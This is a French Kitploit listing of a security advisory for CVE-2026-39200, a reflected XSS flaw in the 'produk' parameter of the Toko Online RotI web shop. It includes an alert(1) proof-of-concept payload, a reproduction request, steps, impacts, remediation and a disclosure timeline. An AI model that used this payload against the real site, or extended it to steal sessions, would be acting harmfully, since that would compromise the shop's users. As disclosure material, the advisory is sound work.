Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-39200 — La valeur du paramètre de requête produk est copiée dans la valeur d'un attribut de balise HTML encapsulé entre guillemets doubles. Le payload xbnw0"><script>alert(1)</script>skc2h a été soumis dans le paramètre produk. Cette entrée a été reflétée sous la forme xbnw0\"><script>alert(1)</script>skc2h dans la réponse de l'application. | Kitploit
Outils/GitHubGitHub/r00tali/cve-2026-39200
Analyse des VulnérabilitésExploitation d'Applications WebSécurité WebTests d'IntrusionArticles et RechercheApprentissage et Éducation
GitHubr00tali/cve-2026-39200

CVE-2026-39200

Voir le dépôt
13il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

La valeur du paramètre de requête produk est copiée dans la valeur d'un attribut de balise HTML encapsulé entre guillemets doubles. Le payload xbnw0"><script>alert(1)</script>skc2h a été soumis dans le paramètre produk. Cette entrée a été reflétée sous la forme xbnw0\"><script>alert(1)</script>skc2h dans la réponse de l'application.

Partager

CVE-2026-39200 — Cross-Site Scripting (XSS) réfléchi dans Toko Online RotI

Résumé

Une vulnérabilité de Cross-Site Scripting (XSS) réfléchi a été identifiée dans le paramètre de requête produk de l'application web Toko Online RotI. L'application ne code pas en HTML les entrées fournies par l'utilisateur avant de les refléter à l'intérieur d'un attribut de balise HTML entouré de guillemets doubles. Un attaquant peut concevoir une URL malveillante qui, lorsqu'elle est consultée par une victime, exécute du JavaScript arbitraire dans le contexte de la session navigateur de la victime.

ChampValeur
Identifiant CVECVE-2026-39200
Type de vulnérabilitéCWE-79 — Neutralisation incorrecte des entrées lors de la génération de pages web (XSS réfléchi)
Produit concernéToko Online RotI (boutique en ligne indonésienne)
Paramètre concernéproduk
DécouvreurUzair Ali (r00tali) — Testeur d'intrusion / Chasseur de bugs
Date de découverte2026-07-03
CVE attribué2026-07-12
Publication de l'avis2026-07-19

Détails de la vulnérabilité

Le paramètre de requête produk est copié tel quel dans la valeur d'un attribut de balise HTML encadré par des guillemets doubles. L'application n'encodant pas en HTML l'entrée fournie par l'utilisateur avant de la refléter, un attaquant peut sortir de l'attribut en soumettant une charge utile contenant un guillemet double fermant suivi d'une charge utile HTML/JavaScript.

Charge utile de la preuve de concept

root@kitploit:~
xbnw0"><script>alert(1)</script>skc2h

Lorsque cette charge utile est soumise comme paramètre produk, l'application renvoie l'entrée dans la réponse sans échappement. Le "> final termine l'attribut d'origine et le bloc injecté <script>alert(1)</script> est interprété par le navigateur comme un nouvel élément HTML, exécutant du JavaScript arbitraire dans la session de l'utilisateur.

Motif vulnérable (conceptuel)

La réponse HTML vulnérable ressemble à ceci :

root@kitploit:~
<!-- BEFORE injection -->
<input type="text" name="produk" value="USER_INPUT" />

<!-- AFTER injection with payload xbnw0"><script>alert(1)</script>skc2h -->
<input type="text" name="produk" value="xbnw0"><script>alert(1)</script>skc2h" />
                                                            ^^^^^^^^^^^^^^^^^^^^^^^^
                                                            Browser executes this

Requête HTTP (reproduction)

root@kitploit:~
GET /[vulnerable-endpoint]?produk=xbnw0%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3Eskc2h HTTP/1.1
Host: [target-host]
User-Agent: Mozilla/5.0

Réponse HTTP (extrait)

root@kitploit:~
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8

<html>
  <body>
    <!-- ... -->
    <input type="text" name="produk" value="xbnw0"><script>alert(1)</script>skc2h" />
    <!-- ... -->
  </body>
</html>

Étapes de reproduction

  1. Identifiez un point de terminaison de l'application Toko Online RotI qui reflète le paramètre produk à l'intérieur d'un attribut HTML (par exemple, une page de recherche, de détail ou de filtre de produit).
  2. Remplacez la valeur du paramètre produk par la charge utile suivante :
    root@kitploit:~
    xbnw0"><script>alert(1)</script>skc2h
    
  3. Soumettez la requête au serveur.
  4. Inspectez la réponse du serveur. La charge utile est renvoyée telle quelle à l'intérieur de l'attribut, sortant du " et produisant un élément <script> valide dans le DOM.
  5. Chargez la réponse ainsi créée dans un navigateur moderne. Une boîte de dialogue JavaScript alert(1) s'affiche, confirmant l'exécution de JavaScript arbitraire dans la session de la victime.

Impact

L'exploitation réussie de ce XSS réfléchi permet à un attaquant de :

  • Voler les cookies de session et les jetons d'authentification, entraînant la prise de contrôle du compte.
  • Effectuer des actions au nom des utilisateurs authentifiés à leur insu.
  • Rediriger les utilisateurs vers des sites malveillants (hameçonnage / collecte d'identifiants).
  • Injecter du contenu malveillant dans l'application (défiguration du site).
  • Capturer les frappes clavier et les données de formulaire soumises par la victime.
  • Exploiter les vulnérabilités du navigateur pour distribuer des logiciels malveillants par téléchargement furtif (drive-by).
  • Abuser de la relation de confiance entre l'utilisateur et le domaine de l'application.

La vulnérabilité étant réfléchie, son exploitation ne requiert qu'un clic de la victime sur un lien frauduleux, ce qui la rend facilement exploitable dans le cadre de campagnes d'hameçonnage.

CVSS v3.1 (estimation) : 6.1 (Moyen) — AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N


Remédiation

Pour remédier à cette vulnérabilité, le fournisseur devrait :

  1. Encoder en HTML toutes les valeurs fournies par l'utilisateur avant qu'elles ne soient reflétées dans la sortie HTML, en particulier <, >, ", ' et & (par exemple, &lt;, &gt;, &quot;, &#x27;, &amp;).
  2. Utiliser les fonctions d'échappement de sortie intégrées au framework plutôt qu'une concaténation manuelle. Exemples :
    • PHP : htmlspecialchars($input, ENT_QUOTES, 'UTF-8')
    • ASP.NET : HttpUtility.HtmlEncode(input) ou la syntaxe <%: %>
    • Python (Jinja2) : {{ input }} (échappement automatique par défaut)
  3. Définir un en-tête de réponse Content-Security-Policy (CSP) strict pour limiter l'impact de toute injection résiduelle :
    root@kitploit:~
    Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'
    
  4. Définir les indicateurs HttpOnly et Secure sur tous les cookies de session afin d'empêcher JavaScript de les lire.
  5. Valider le paramètre produk par rapport à une liste blanche d'identifiants de produits attendus (identifiants numériques, slugs, etc.) et rejeter tout ce qui ne correspond pas.
  6. Ajouter X-Content-Type-Options: nosniff pour empêcher la détection du type MIME des corps de réponse.

Chronologie de divulgation

DateÉvénement
2026-07-03Vulnérabilité découverte lors de tests de sécurité autorisés
2026-07-03Identifiant CVE demandé à MITRE via cveform.mitre.org
2026-07-12CVE-2026-39200 attribué par l'équipe d'attribution de MITRE
2026-07-19Publication de l'avis public

Découvreur

** Uzair Ali (r00tali)** — Testeur d'intrusion / Chasseur de bugs / Chercheur en sécurité

  • GitHub : https://github.com/r00tali

Références

  • OWASP — Cross-Site Scripting (XSS)
  • CWE-79 : Neutralisation incorrecte des entrées lors de la génération de pages web
  • PortSwigger — XSS réfléchi
  • Enregistrement CVE MITRE — CVE-2026-39200

Avertissement

Cet avis est publié à des fins éducatives et défensives uniquement. La vulnérabilité a été signalée dans le cadre du processus de divulgation responsable, via l'équipe d'attribution des CVE de MITRE. Aucune information confidentielle du fournisseur, aucune donnée client ni aucun code propriétaire ne sont divulgués. La preuve de concept utilise une charge utile bénigne alert(1) et vise à démontrer l'existence du bug, et non à faciliter des attaques contre le service en production.

Télécharger l’outil